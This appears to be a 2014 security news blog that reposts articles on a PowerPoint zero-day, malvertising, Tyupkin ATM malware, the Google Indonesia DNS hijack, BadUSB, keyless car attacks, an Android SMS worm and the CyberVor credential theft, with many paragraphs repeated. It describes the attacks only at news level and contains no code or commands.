Tuesday, November 11, 2014
Sunday, October 26, 2014
Microsoft warns on security flaws in Power Point Slides
Microsoft
has warned Windows users about a zero-day security issue with malicious
PowerPoint documents being emailed to recipients. The software giant is
working on a patch for the problem.
Another Microsoft OLE security issue revealed...
Some researchers have pointed out that this zero-day is similar to one patched last week, when Microsoft issued no less than eight updates, including one (Sandworm) known to have been exploited in the wild, pending an update.
Whilst it creates a patch, Microsoft has created an interim Fixit tool that, when applied, blocks the attacks seen so far. The tool can be downloaded on Microsoft's support pages.
Microsoft has also asked Windows users to pay attention to the User Account Control (UAC) pop-ups, the small alerts that require authorisation before the OS is allowed to perform certain tasks, such as downloading files or running software.
According to Steve Armstrong, technical security director with pen testing specialist Logically Secure, whilst the impact of a MS Zero day is bad, looking at the published workarounds suggests that users who enable UAC by default - and who do not have users with highly privileged accounts - can minimise the risks involved.
08 elements of Patch Tuesday
Open-Source Bugs Affect to Web Applications
An average of eight severe security flaws from open-source and third-party code can be found in each web application, according to new findings from Veracode.
If the Heartbleed and Shellshock vulnerability scares didn't drive home the increasing risk that open-source software poses to today's applications, consider this: Open-source and third-party code brings an average of 24 known security bugs to every web application, according to new data.
Open-source and third-party software components also introduced an average of eight "very high severity" or "high severity" security flaws to applications, according to Veracode, which today released findings from an analysis it conducted of more than 5,300 enterprise web applications uploaded to its code-scanning service over the past two months.
"The use of open source has increased heavily over time. Enterprises have become more comfortable using it," says Chris Wysopal, CTO at Veracode. "At the same time, the researcher community and attacker communities have woken up to this, too… That's why you're seeing Heartbleed and Shellshock, because people are looking at it and scrutinizing it. In the last year or two, all that code has been reviewed and made better. But it's probably only going to get worse" as researchers find more bugs and attackers start using them.
Dennis Chu, senior product manager at Coverity, which discovered 688 OWASP Top 10 security issues in 37 open-source projects it recently studied, says open-source bugs are often the cause of stealthy attacks. "A lot of times open-source bugs manifest themselves in very invisible security breaches."
It's not that open-source and third-party code is necessarily inherently more or less secure than commercial software, security experts say. Some open-source projects have been strapped for resources to keep the code clean -- leading to problems like Heartbleed, for instance -- but the real issue now is that more enterprises use open-source code, and researchers, as well as attackers, are taking notice.
Read More: http://www.darkreading.com/application-security/open-source-software-brings-bugs-to-web-applications/d/d-id/1316878?_mc=NL_DR_EDT_DR_weekly_20141023&cid=NL_DR_EDT_DR_weekly_20141023&elq=39da7f9fc52a4cd6ada82d9d5e34a2e9&elqCampaignId=9872
If the Heartbleed and Shellshock vulnerability scares didn't drive home the increasing risk that open-source software poses to today's applications, consider this: Open-source and third-party code brings an average of 24 known security bugs to every web application, according to new data.
Open-source and third-party software components also introduced an average of eight "very high severity" or "high severity" security flaws to applications, according to Veracode, which today released findings from an analysis it conducted of more than 5,300 enterprise web applications uploaded to its code-scanning service over the past two months.
"The use of open source has increased heavily over time. Enterprises have become more comfortable using it," says Chris Wysopal, CTO at Veracode. "At the same time, the researcher community and attacker communities have woken up to this, too… That's why you're seeing Heartbleed and Shellshock, because people are looking at it and scrutinizing it. In the last year or two, all that code has been reviewed and made better. But it's probably only going to get worse" as researchers find more bugs and attackers start using them.
Dennis Chu, senior product manager at Coverity, which discovered 688 OWASP Top 10 security issues in 37 open-source projects it recently studied, says open-source bugs are often the cause of stealthy attacks. "A lot of times open-source bugs manifest themselves in very invisible security breaches."
It's not that open-source and third-party code is necessarily inherently more or less secure than commercial software, security experts say. Some open-source projects have been strapped for resources to keep the code clean -- leading to problems like Heartbleed, for instance -- but the real issue now is that more enterprises use open-source code, and researchers, as well as attackers, are taking notice.
Read More: http://www.darkreading.com/application-security/open-source-software-brings-bugs-to-web-applications/d/d-id/1316878?_mc=NL_DR_EDT_DR_weekly_20141023&cid=NL_DR_EDT_DR_weekly_20141023&elq=39da7f9fc52a4cd6ada82d9d5e34a2e9&elqCampaignId=9872
Monday, October 20, 2014
Malvertising campaigns hit US military industry to steal secrets and intellectual property
A new wave of malvertising attacks finalized to cyber espionage is targeting military contractors to military secrets and intellectual property.
Security experts at security company Invincea have uncovered a new malvertisingcampaign used as a attack vector for highly-targeted cyber espionage operations against at least three firms in the US military industry.
The malvertising is becoming even more popular in the criminal underground, many cases were spotted recently which exploited the ad network of IT giants like Googleand Yahoo.
According the experts at Invincea, malvertising campaign allowed threat actors to steal military secrets or intellectual property rather than click-fraud or financial frauds( e.g. Phishing). The circumstance is alarming because many of the targeted companies are providing technology for use in combat zones.
“In the past, we have seen organized cyber crime learn attack techniques from advanced nation state actors,” Invincea Chief Executive Anup Ghosh said, using industry parlance for cyber spies. “This is a case where advanced state actors would be learning from cyber crime in terms of methods and tactics.”
The researchers discovered that using high targeted online advertising threat actors hit major U.S. military contractors in the past few weeks, Invincea declined to name the victims of the malvertising campaigns.
Data security breaches now regularly hit high-profile businesses such asbanks and retailers, leaving millions of consumers vulnerable to identity theft and financial fraud. But research into malvertising has revealed how cyber-criminals and spies can use the marketing industry’s latest tools to pinpoint high-value targets.” reports the Reuters Agency.
The experts at Invincea spotted up to six malvertising attacks that targeted one aerospace contractor and other military contractors in the last weeks of September.
The experts haven’t provided any information on the alleged source of the malvertising attacks, instead they confirmed that attackers used demographic targeting toolsavailable to any online marketer to exploit advertising bidding networks.
“Perpetrators can set up a corporate front to deliver normal ads, then swap landing pages from time to time for malicious code. They place these ads on advertising exchanges and bid up prices for placement on sites that its targets are known to visit, based on what they glean from these intended victims’ advertising profiles.” states the Reuters.
Malvertising website are difficult to be localized, the majority of them belong to the category of One Day Wonders, so the stay online just for the time of the attack, typically for less than four hours. A study conducted by Blue Coat on 660 million unique hostnames reports that 470 Million websites are One Day Wonders and 22 Percent are malicious.
The analysis conducted by experts at Invincea firm confirms the presence of serious flaw in most online advertising networks that could be easily exploited by threat actors.
“Any real-time ad bidding service that allows for automatic redirection is inherently insecure,” said Pat Belcher, who heads Invincea’s security analytics team, which conducted the forensic research. “It is across the board.”
Unfortunately, cyber criminals are winning the fight against the online advertising industry, recent cases demonstrate that the web ad industry is still vulnerable to malvertising campaigns.
Ad networks are too easy to compromise and unaware users haven’t necessary skills and tools to protect their machines.
The major advertising organizations in the US will collaborate to monitor and prevent illegal activities.
“Criminal activity threatens to erode trust in the digital ecosystem,” Randall Rothenberg, chief executive of the Interactive Advertising Bureau said. “It is time that publishers, marketers and agencies stand together to combat these dangerous forces as a unified entity.”
Unfortunately as explained by Invincea malversting is a common practice that is not properly addressed by Advertising industry, it’s time to consider security an indispensable investment and not a cost to reduce.
Security experts at security company Invincea have uncovered a new malvertisingcampaign used as a attack vector for highly-targeted cyber espionage operations against at least three firms in the US military industry.
The malvertising is becoming even more popular in the criminal underground, many cases were spotted recently which exploited the ad network of IT giants like Googleand Yahoo.
According the experts at Invincea, malvertising campaign allowed threat actors to steal military secrets or intellectual property rather than click-fraud or financial frauds( e.g. Phishing). The circumstance is alarming because many of the targeted companies are providing technology for use in combat zones.
“In the past, we have seen organized cyber crime learn attack techniques from advanced nation state actors,” Invincea Chief Executive Anup Ghosh said, using industry parlance for cyber spies. “This is a case where advanced state actors would be learning from cyber crime in terms of methods and tactics.”
The researchers discovered that using high targeted online advertising threat actors hit major U.S. military contractors in the past few weeks, Invincea declined to name the victims of the malvertising campaigns.
Data security breaches now regularly hit high-profile businesses such asbanks and retailers, leaving millions of consumers vulnerable to identity theft and financial fraud. But research into malvertising has revealed how cyber-criminals and spies can use the marketing industry’s latest tools to pinpoint high-value targets.” reports the Reuters Agency.
The experts at Invincea spotted up to six malvertising attacks that targeted one aerospace contractor and other military contractors in the last weeks of September.
The experts haven’t provided any information on the alleged source of the malvertising attacks, instead they confirmed that attackers used demographic targeting toolsavailable to any online marketer to exploit advertising bidding networks.
“Perpetrators can set up a corporate front to deliver normal ads, then swap landing pages from time to time for malicious code. They place these ads on advertising exchanges and bid up prices for placement on sites that its targets are known to visit, based on what they glean from these intended victims’ advertising profiles.” states the Reuters.
Malvertising website are difficult to be localized, the majority of them belong to the category of One Day Wonders, so the stay online just for the time of the attack, typically for less than four hours. A study conducted by Blue Coat on 660 million unique hostnames reports that 470 Million websites are One Day Wonders and 22 Percent are malicious.
The analysis conducted by experts at Invincea firm confirms the presence of serious flaw in most online advertising networks that could be easily exploited by threat actors.
“Any real-time ad bidding service that allows for automatic redirection is inherently insecure,” said Pat Belcher, who heads Invincea’s security analytics team, which conducted the forensic research. “It is across the board.”
Unfortunately, cyber criminals are winning the fight against the online advertising industry, recent cases demonstrate that the web ad industry is still vulnerable to malvertising campaigns.
Ad networks are too easy to compromise and unaware users haven’t necessary skills and tools to protect their machines.
The major advertising organizations in the US will collaborate to monitor and prevent illegal activities.
“Criminal activity threatens to erode trust in the digital ecosystem,” Randall Rothenberg, chief executive of the Interactive Advertising Bureau said. “It is time that publishers, marketers and agencies stand together to combat these dangerous forces as a unified entity.”
Unfortunately as explained by Invincea malversting is a common practice that is not properly addressed by Advertising industry, it’s time to consider security an indispensable investment and not a cost to reduce.
Wednesday, October 8, 2014
Hackers Steal Millions In Cash From ATMs, Using Tyupkin Malware
Attackers are infecting ATMs in Asia, Europe, and Latin America with malware, and walking off with stacks of cash, Kaspersky has found. Using the malware, called Tyupkin, and a team of money mules, the attackers have stolen what amounts to millions of dollars in cash.
“Over the last few years, we have observed a major upswing in ATM attacks using skimming devices and malicious software," said Vicente Diaz, principal security researcher at Kaspersky Lab, in a statement. "Now we are seeing the natural evolution of this threat with cyber-criminals moving up the chain and targeting financial institutions directly. This is done by infecting ATMs themselves or launching direct APT-style attacks against banks. The Tyupkin malware is an example of the attackers taking advantage of weaknesses in the ATM infrastructure.”
The good news is that the infection and theft require physical access to the ATM. The bad news is that it's easy to come by, since ATMs are intended to be physically accessible by the general public 24/7. That said, the attackers only went after machines that did not have security alarms installed.
“Over the last few years, we have observed a major upswing in ATM attacks using skimming devices and malicious software," said Vicente Diaz, principal security researcher at Kaspersky Lab, in a statement. "Now we are seeing the natural evolution of this threat with cyber-criminals moving up the chain and targeting financial institutions directly. This is done by infecting ATMs themselves or launching direct APT-style attacks against banks. The Tyupkin malware is an example of the attackers taking advantage of weaknesses in the ATM infrastructure.”
The good news is that the infection and theft require physical access to the ATM. The bad news is that it's easy to come by, since ATMs are intended to be physically accessible by the general public 24/7. That said, the attackers only went after machines that did not have security alarms installed.
During those hours, a unique key, based on a random set of numbers displayed by the ATM machine, is generated for each session. Video evidence shows that the mule collecting the cash calls another gang member on the phone and gives them that random combination. The person on the other side of the call then runs those digits through an algorithm to generate the session key, and gives the key to the mule. Once the key is entered, the machine displays the amount of cash located in each cassette, and dispenses 40 banknotes from whichever cassette the attacker chooses.
The process prevents both regular customers from accidentally triggering the attack and money mules from trying to steal the money themselves without the rest of the gang knowing about it.
Watch video at: http://www.darkreading.com/hackers-steal-millions-in-cash-from-atms-using-tyupkin-malware/d/d-id/1316421?_mc=sm_dr
Monday, October 6, 2014
Google Indonesia was Hacked
As reported today few hours back Google Indonesia was Hacked and left defaced page for hours. The technology gaint Google Indonesia domain which is www.google.co.id was hacked and left defaced for several hours in morning, The very famous Pakistani hackers group “Team Madleets” claimed responsibility for the hack.
Google Indonesia was hijacked using a hacking method known as DNS Spoofing ( DNS Cache Poisoning ) . Pakistani hacker’s group “Team Madleets” are known for such attacks targeting big websites like Google, Last year the same method was used to hijack Google Malasiya domian.
What is DNS Poisoning?
In short, DNS spoofing or DNS cache poisoning is a hacking attack, whereby data is introduced into a Domain Name System (DNS) name server’s cache database, causing the name server to return an incorrect IP address, diverting traffic to another website.
Normally, a networked computer uses a DNS server provided by an Internet service provider (ISP). which are deployed to improve resolution response performance by caching previously obtained query results
Attacker spoofs the IP address DNS entries for a target website on a given DNS server, replacing it with the IP address of a server which he controls, thus redirecting the whole traffic to his deface page. It is believed that the DNS spoofing led the Google Indonesian users to another IP which carried the Madleets defaced page.
Google Indonesia Website was left defaced for several hours
While it is not clear for how long the Google Indonesia website was left defaced, but reports suggest that the attack continued for hours, Team MaDLeeTs also changed the earlier deface page planted after 2 hours with a new one.
Google Indonesia was hijacked using a hacking method known as DNS Spoofing ( DNS Cache Poisoning ) . Pakistani hacker’s group “Team Madleets” are known for such attacks targeting big websites like Google, Last year the same method was used to hijack Google Malasiya domian.
What is DNS Poisoning?
In short, DNS spoofing or DNS cache poisoning is a hacking attack, whereby data is introduced into a Domain Name System (DNS) name server’s cache database, causing the name server to return an incorrect IP address, diverting traffic to another website.
Normally, a networked computer uses a DNS server provided by an Internet service provider (ISP). which are deployed to improve resolution response performance by caching previously obtained query results
Attacker spoofs the IP address DNS entries for a target website on a given DNS server, replacing it with the IP address of a server which he controls, thus redirecting the whole traffic to his deface page. It is believed that the DNS spoofing led the Google Indonesian users to another IP which carried the Madleets defaced page.
Google Indonesia Website was left defaced for several hours
While it is not clear for how long the Google Indonesia website was left defaced, but reports suggest that the attack continued for hours, Team MaDLeeTs also changed the earlier deface page planted after 2 hours with a new one.
BadUSB Malware Returns
Back in July, a massive security hole was discovered ” BadUSB ” that can gave hackers the ability to hijack billions of USB devices, from keyboards, printers to USB drives. Because of the severity of the issue, the researchers who discovered the security flaw didn’t publish their BadUSB exploit code.
However, after that two other hackers have worked out on how to exploit BadUSB and released a bunch of hacking tools that can be used to convert USB drive into silent malware installer. Also they’ve published their BadUSB Malware source code on open source code hosting website Github for public. Device makers are pressured to actually fix the security flaw before millions of users have their USB devices exploited, which is a big problem as there’s no easy security fix for BadUSB Malware.
What is BadUSB ?
BadUSB Malware Released - Infect millions of USB DrivesIn short, every USB drives has a microcontroller in it which is a small chip that acts as an interface between the device ( keyboard, or flash drive) and the host (PC). This small chip often has firmware that can be reprogrammed to do notorious things, such as logging your keystrokes and infect your Personal computer with malware, or something much worse. BadUSB is really very dangerous because of one factor which is “It is Undetectable”, even if scanned by Antivirus program.
The security researchers who originally discovered the BadUSB are Karsten Nohl and his friends at SR Labs announced that the BadUSB bug exists in July, and shared more details with device makers. Here you can watch the video of their presentation. The German security researchers did not publish their source code because they thought it would be dangerous and too hard to patch.
We really hope that releasing this will push device manufactures to insist on signed firmware updates, and that USB Manufacturer Phison will add extra support for signed updates to all of the controllers it sells,” Caudill said in his Blog. “Phison electronics isn’t the only player, though they are the most common I’d love to see them take the lead in improving security for these devices.
Now, however two security researchers Adam Caudill and Brandon Wilson at Derbycon in Kentucky have discovered the same BadUSB bug and, more importantly, they’ve published their proof-of-concept. They has capability to spread itself by hiding in the firmware meant to control the ways in which USB drives connect to computers.
If you know what you’re doing, you can grab the source code and start exploiting USB devices straight away. The hack utilizes the security flaw in the USB that allows an attacker to write a self-replicating worm that key logs passwords and other sensitive data stands to make millions of dollars.
Source Code is Available On Internet for Free
The two security researchers justify their release in Derbycon Hacker Conference in Louisville last week, both were able to reverse engineer the USB firmware & infect it with their own malicious code & hijack the associated device. They also underlined the danger of the BadUSB hack by going in-depth of the source code.
The two security researchers replicated the emulated keyboard attack, and also showed how to create a hidden partition on thumb drives to defeat forensic tools and how to bypass the password for protected partitions on some USB drives that provide such a feature.
BadUSB vulnerability presents in only one Taiwanese electronics company which is Phison electronics. But the Phison USB device can infect any device they are plugged into. The Taiwanese USB Manufacturer has not yet revealed for whom it manufactures USB drives.
BadUSB Vulnerability is Undetectable & Unpatchable
The Vulnerability flaw in Phison USB basically modifies the firmware of USB devices, which can be done from inside the operating system easily and hides the malware in USB devices in a way that it become almost impossible to detect it, even by Antiviruses. The security flaw goes even more worst when complete formatting or deleting the contents of a USB device wouldn’t vanish the malicious code, as it is embed in the firmware.
According to Wired, this BadUSB vulnerability is practically unpatchable because it exploits the very way that USB device is designed. If Once infected, each USB drive will infect anything it’s connected to.
Impact of BadUSB Vulnerability
Once the device is compromised, the USB devices can reportedly:
1). Log keystrokes
2). alter folders & files
3). infect other devices & systems
4). spoofs a network card to change the computer’s DNS setting
5). Install malware & Control Keyboard
However, after that two other hackers have worked out on how to exploit BadUSB and released a bunch of hacking tools that can be used to convert USB drive into silent malware installer. Also they’ve published their BadUSB Malware source code on open source code hosting website Github for public. Device makers are pressured to actually fix the security flaw before millions of users have their USB devices exploited, which is a big problem as there’s no easy security fix for BadUSB Malware.
What is BadUSB ?
BadUSB Malware Released - Infect millions of USB DrivesIn short, every USB drives has a microcontroller in it which is a small chip that acts as an interface between the device ( keyboard, or flash drive) and the host (PC). This small chip often has firmware that can be reprogrammed to do notorious things, such as logging your keystrokes and infect your Personal computer with malware, or something much worse. BadUSB is really very dangerous because of one factor which is “It is Undetectable”, even if scanned by Antivirus program.
The security researchers who originally discovered the BadUSB are Karsten Nohl and his friends at SR Labs announced that the BadUSB bug exists in July, and shared more details with device makers. Here you can watch the video of their presentation. The German security researchers did not publish their source code because they thought it would be dangerous and too hard to patch.
We really hope that releasing this will push device manufactures to insist on signed firmware updates, and that USB Manufacturer Phison will add extra support for signed updates to all of the controllers it sells,” Caudill said in his Blog. “Phison electronics isn’t the only player, though they are the most common I’d love to see them take the lead in improving security for these devices.
Now, however two security researchers Adam Caudill and Brandon Wilson at Derbycon in Kentucky have discovered the same BadUSB bug and, more importantly, they’ve published their proof-of-concept. They has capability to spread itself by hiding in the firmware meant to control the ways in which USB drives connect to computers.
If you know what you’re doing, you can grab the source code and start exploiting USB devices straight away. The hack utilizes the security flaw in the USB that allows an attacker to write a self-replicating worm that key logs passwords and other sensitive data stands to make millions of dollars.
Source Code is Available On Internet for Free
The two security researchers justify their release in Derbycon Hacker Conference in Louisville last week, both were able to reverse engineer the USB firmware & infect it with their own malicious code & hijack the associated device. They also underlined the danger of the BadUSB hack by going in-depth of the source code.
The two security researchers replicated the emulated keyboard attack, and also showed how to create a hidden partition on thumb drives to defeat forensic tools and how to bypass the password for protected partitions on some USB drives that provide such a feature.
BadUSB vulnerability presents in only one Taiwanese electronics company which is Phison electronics. But the Phison USB device can infect any device they are plugged into. The Taiwanese USB Manufacturer has not yet revealed for whom it manufactures USB drives.
BadUSB Vulnerability is Undetectable & Unpatchable
The Vulnerability flaw in Phison USB basically modifies the firmware of USB devices, which can be done from inside the operating system easily and hides the malware in USB devices in a way that it become almost impossible to detect it, even by Antiviruses. The security flaw goes even more worst when complete formatting or deleting the contents of a USB device wouldn’t vanish the malicious code, as it is embed in the firmware.
According to Wired, this BadUSB vulnerability is practically unpatchable because it exploits the very way that USB device is designed. If Once infected, each USB drive will infect anything it’s connected to.
Impact of BadUSB Vulnerability
Once the device is compromised, the USB devices can reportedly:
1). Log keystrokes
2). alter folders & files
3). infect other devices & systems
4). spoofs a network card to change the computer’s DNS setting
5). Install malware & Control Keyboard
Protection Against the BadUSB Attack
For the time being, the best mitigation against BadUSB vulnerability and other similar exploits is good security practices. Always Keep your software updated & never open any files which you don’t recognize, and don’t plug any devices into your computer unless you know where they’ve been.
For the time being, the best mitigation against BadUSB vulnerability and other similar exploits is good security practices. Always Keep your software updated & never open any files which you don’t recognize, and don’t plug any devices into your computer unless you know where they’ve been.
Wednesday, October 1, 2014
List of Cyber Attacks and Data Breaches in September
Although this month’s list may not be as long as August’s, it’s by far the most shocking of the year so far. The number of payment card breaches in the US appears to be going up and up and an end isn’t in sight. This list will continue to be updated until the very end of September, and as there’s a high chance of more breaches due to the revelation of Shellshock, I suggest you come back for updates.
Payment card breaches
880,000 Affected by Viator Payment Card Breach
Hundreds of US Stores Affected as POS Provider is Hacked
Biggest ever data breach? Home Depot hack attack could involve 60 million payment cards
800k Payment Cards Compromised in Goodwill Industries Breach
Payment card data stolen in Jimmy John’s data breach
Hotel Chain Suffers Payment Card Breach
Personal data breaches
Florida medical center hit with breach for third time in two years
Data breach at Tampa General Hospital
Central Utah Clinic notifies over 30K patients of potential HIPAA breach
Computer hardware containing patient data stolen from Ohio plastic surgery office
5 Million Leaked Gmail Passwords Sounds Pretty Scary, But Was It?
Other attacks and breaches
Ello? ello? ello?: Facebook challenger in DDoS KNOCKOUT
Biggest attack on RT.com: Website hit by 10 Gbps DDoS
Operation Harkonnen: European Cyber Espionage Went Undetected for 13 Years
Naked pictures of Jennifer Lawrence and other celebrity starlets leak online
eBay XSS vulnerability used iPhones as bait, redirected users to phishing page
Hackers attack Namecheap accounts
Healthcare information compromised at Temple University, Philadelphia
ObamaCare Website Hacked
New ‘Shellshock’ bash bug affects 500 million computers, servers and devices.
Payment card breaches
880,000 Affected by Viator Payment Card Breach
Hundreds of US Stores Affected as POS Provider is Hacked
Biggest ever data breach? Home Depot hack attack could involve 60 million payment cards
800k Payment Cards Compromised in Goodwill Industries Breach
Payment card data stolen in Jimmy John’s data breach
Hotel Chain Suffers Payment Card Breach
Personal data breaches
Florida medical center hit with breach for third time in two years
Data breach at Tampa General Hospital
Central Utah Clinic notifies over 30K patients of potential HIPAA breach
Computer hardware containing patient data stolen from Ohio plastic surgery office
5 Million Leaked Gmail Passwords Sounds Pretty Scary, But Was It?
Other attacks and breaches
Ello? ello? ello?: Facebook challenger in DDoS KNOCKOUT
Biggest attack on RT.com: Website hit by 10 Gbps DDoS
Operation Harkonnen: European Cyber Espionage Went Undetected for 13 Years
Naked pictures of Jennifer Lawrence and other celebrity starlets leak online
eBay XSS vulnerability used iPhones as bait, redirected users to phishing page
Hackers attack Namecheap accounts
ObamaCare Website Hacked
New ‘Shellshock’ bash bug affects 500 million computers, servers and devices.
Monday, August 11, 2014
Keyless Smart Cars are now target for hackers
Now it is the turn of smart keyless car becoming target for hackers, that high-tech keyless car security system is pretty sweet for hackers. According to a new report in Wired, thieves can use off-the-shelf hardware and software to impersonate a vehicle's security fob and break into a car in no more than a few minutes.
This vulnerability in keyless vehicles illustrates what is practically an axiom in technology: Convenience often reduces security. And in a corollary truth, hackers are usually at least one step ahead of the technologies intended to thwart them.
Australian security researcher Silvio Cesare plans to review his findings about this new approach to keyless break-ins at this week's Black Hat Internet security conference in Las Vegas. The annual event is a place where people from law enforcement, security experts, military intelligence and even the shady side of the street come together.
People have previously found weaknesses in keyless entries. In 2012, for instance, a rash of Chicago car break-ins were linked to someone using some kind of electronic tool.
Meanwhile, Swiss researchers have found a way to get someone's key fob to broadcast an open command so it can be duplicated, potentially allowing thieves to break into and operate a car.
However, Cesare thinks that he may be the first to actually crack the encryption intended to guard they keyless systems. He built a device that would keep pressing the buttons on his own fob. After collecting thousands of samples of the codes intended to be picked up by the car, he found patters that reduced the number of possible codes to unlock a vehicle from 43 million to less than 13,000.
That's still a big number for humans, but computers can try that many sequences without getting bored, wasting time or needing a bathroom break.
Other auto threats are also a topic of discussion at the Black Hat conference. According to InformationWeek, as cars increasingly feature on-vehicle wireless networks that connect with satellite services and smartphones, they become more vulnerable to remote attacks. By breaking into a car's Bluetooth network or a phone app, for instance, someone could in theory control a car's steering, braking or automated parking.
Last year, researchers showed how they could take control of many basic functions in a 2010 Toyota Prius and 2010 Ford Escape. Among new vehicles, the 2014 Jeep Cherokee, 2014 Infiniti Q50 and 2015 Escalade are the most vulnerable to attack, according to security researchers. A 2014 Audi A8 was deemed the least vulnerable model to electronic attack because the car's networked systems are separate from its physical operational systems.
The automobile industry has begun to take such threats more seriously. Last month it announced a mechanism to share security vulnerabilities.
This vulnerability in keyless vehicles illustrates what is practically an axiom in technology: Convenience often reduces security. And in a corollary truth, hackers are usually at least one step ahead of the technologies intended to thwart them.
Australian security researcher Silvio Cesare plans to review his findings about this new approach to keyless break-ins at this week's Black Hat Internet security conference in Las Vegas. The annual event is a place where people from law enforcement, security experts, military intelligence and even the shady side of the street come together.
People have previously found weaknesses in keyless entries. In 2012, for instance, a rash of Chicago car break-ins were linked to someone using some kind of electronic tool.
Meanwhile, Swiss researchers have found a way to get someone's key fob to broadcast an open command so it can be duplicated, potentially allowing thieves to break into and operate a car.
However, Cesare thinks that he may be the first to actually crack the encryption intended to guard they keyless systems. He built a device that would keep pressing the buttons on his own fob. After collecting thousands of samples of the codes intended to be picked up by the car, he found patters that reduced the number of possible codes to unlock a vehicle from 43 million to less than 13,000.
That's still a big number for humans, but computers can try that many sequences without getting bored, wasting time or needing a bathroom break.
Other auto threats are also a topic of discussion at the Black Hat conference. According to InformationWeek, as cars increasingly feature on-vehicle wireless networks that connect with satellite services and smartphones, they become more vulnerable to remote attacks. By breaking into a car's Bluetooth network or a phone app, for instance, someone could in theory control a car's steering, braking or automated parking.
Last year, researchers showed how they could take control of many basic functions in a 2010 Toyota Prius and 2010 Ford Escape. Among new vehicles, the 2014 Jeep Cherokee, 2014 Infiniti Q50 and 2015 Escalade are the most vulnerable to attack, according to security researchers. A 2014 Audi A8 was deemed the least vulnerable model to electronic attack because the car's networked systems are separate from its physical operational systems.
The automobile industry has begun to take such threats more seriously. Last month it announced a mechanism to share security vulnerabilities.
One million Android devices infected in China
One million Android devices in China were infected with an Xshqi SMS worm on August 2, the day the country celebrated Valentine’s Day.
Experts at Kaspersky Lab revealed that a malware, dubbedTrojan.AndroidOS.Xshqi.a, infected neatly 500,000 Android devices in just six hours last week in China, but Chinese media provided a more pessimistic estimate declaring that the number of infected mobile is over 1 million smartphones.
The attackers operated in conjunction of the day the country celebrated Valentine’s Day as explained by Kaspersky team.
“The fact that this Trojan combination appeared on the Chinese Valentine’s Day is premeditated, taking advantage of user credulity on this special day. And it uses social engineering techniques to spread as much as possible and infect more devices. This Trojan is a good example of why it’s always worth thinking twice about trusting a link received on your mobile phone. No matter who sends it, it could still be a malicious program.,” reported researcher Vigi Zhang in a blog post.
The malware has been classified as a mobile SMS worm, but it includes also two malicious modules, the XXshenqi.apk and its asset Trogoogle.apk, the first one is used to spread the malicious code meanwhile the other component is a backdoor.
Once a mobile device is infected by Trojan.AndroidOS.Xshqi.a, the malware sends malicious SMSs to all the contacts in the victim’s address book. The link is used by malware authors to get victims to install the Trojan as well, Trojan.AndroidOS.Xshqi.a that verify the presence of the Trogoogle.apk, if it isn’t installed it displays a dialog window to prompt the user to install Trogoogle.apk. detected by Kaspersky as Backdoor.AndroidOS.Trogle.a.
The backdoor is used by cybercriminals to perform numerous operations, for example in order to steal victim’s personal information it asks user to register the app. The backdoor also enables the attackers to control victim’s device and send different commands to perform several operations, for example to create and send text messages.
Chinese law enforcement has already identified the author of the malicious campaign, he is a 19-year-old college student that admitted creating the malicious code, but he claimed that he only did it for fun. The young man was detained in the city of Shenzhen while visiting his parents.
Experts at Kaspersky Lab revealed that a malware, dubbedTrojan.AndroidOS.Xshqi.a, infected neatly 500,000 Android devices in just six hours last week in China, but Chinese media provided a more pessimistic estimate declaring that the number of infected mobile is over 1 million smartphones.
The attackers operated in conjunction of the day the country celebrated Valentine’s Day as explained by Kaspersky team.
“The fact that this Trojan combination appeared on the Chinese Valentine’s Day is premeditated, taking advantage of user credulity on this special day. And it uses social engineering techniques to spread as much as possible and infect more devices. This Trojan is a good example of why it’s always worth thinking twice about trusting a link received on your mobile phone. No matter who sends it, it could still be a malicious program.,” reported researcher Vigi Zhang in a blog post.
The malware has been classified as a mobile SMS worm, but it includes also two malicious modules, the XXshenqi.apk and its asset Trogoogle.apk, the first one is used to spread the malicious code meanwhile the other component is a backdoor.
Once a mobile device is infected by Trojan.AndroidOS.Xshqi.a, the malware sends malicious SMSs to all the contacts in the victim’s address book. The link is used by malware authors to get victims to install the Trojan as well, Trojan.AndroidOS.Xshqi.a that verify the presence of the Trogoogle.apk, if it isn’t installed it displays a dialog window to prompt the user to install Trogoogle.apk. detected by Kaspersky as Backdoor.AndroidOS.Trogle.a.
The backdoor is used by cybercriminals to perform numerous operations, for example in order to steal victim’s personal information it asks user to register the app. The backdoor also enables the attackers to control victim’s device and send different commands to perform several operations, for example to create and send text messages.
Chinese law enforcement has already identified the author of the malicious campaign, he is a 19-year-old college student that admitted creating the malicious code, but he claimed that he only did it for fun. The young man was detained in the city of Shenzhen while visiting his parents.
Wednesday, August 6, 2014
Russian Cyber criminals hacked 1.2 billion usernames and Passwords
A Russian group has hacked 1.2 billion usernames and passwords belonging to more than 500 million email addresses, according to Hold Security - a US firm specialising in discovering breaches.
Hold Security described the hack as the "largest data breach known to date".
It claimed the stolen information came from more than 420,000 websites, including "many leaders in virtually all industries across the world".
Hold Security described the hack as the "largest data breach known to date".
It claimed the stolen information came from more than 420,000 websites, including "many leaders in virtually all industries across the world".
Hold Security did not give details of the companies affected by the hack.
"They didn't just target large companies; instead, they targeted every site that their victims visited," Hold Security said in its report.
"With hundreds of thousands of sites affected, the list includes many leaders in virtually all industries across the world, as well as a multitude of small or even personal websites."
These databases were used to attack e-mail providers, social media, and other websites to distribute spam to victims and install malicious redirections on legitimate systems”
Hold Security
The New York Times, which first reported the findings, said that on its request "a security expert not affiliated with Hold Security analysed the database of stolen credentials and confirmed it was authentic".
"Another computer crime expert who had reviewed the data, but was not allowed to discuss it publicly, said some big companies were aware that their records were among the stolen information," the paper said.
The paper added: "Hold Security would not name the victims, citing nondisclosure agreements and a reluctance to name companies whose sites remained vulnerable."
The Wall Street Journal later revealed that Hold intended to offer website owners the ability to check whether they had been affected, but only if they paid a fee.
The firm initially posted a message on its site saying it would charge $120 (£71) a month for the "breach notification service", however the details have since been replaced with a message saying "coming soon!".
Multi-pronged attack?
Hold Security, which has previously reported about hacks on Adobe and Target, said it took more than seven months of research to discover the extent of the latest hack.
The firm claimed the gang initially acquired databases of stolen credentials from fellow hackers on the black market.
"These databases were used to attack e-mail providers, social media, and other websites to distribute spam to victims and install malicious redirections on legitimate systems," Hold Security said.
The hackers also got access to data from botnets - a network of computers infected with malware to trigger online fraud.
Hold Security said the botnets helped the hacking group - which it dubbed CyberVor - identify more than 400,000 websites that were vulnerable to cyber attacks.
"The CyberVors used these vulnerabilities to steal data from these sites' databases," the firm said.
"To the best of our knowledge, they mostly focused on stealing credentials, eventually ending up with the largest cache of stolen personal information, totalling over 1.2 billion unique sets of e-mails and passwords."
"They didn't just target large companies; instead, they targeted every site that their victims visited," Hold Security said in its report.
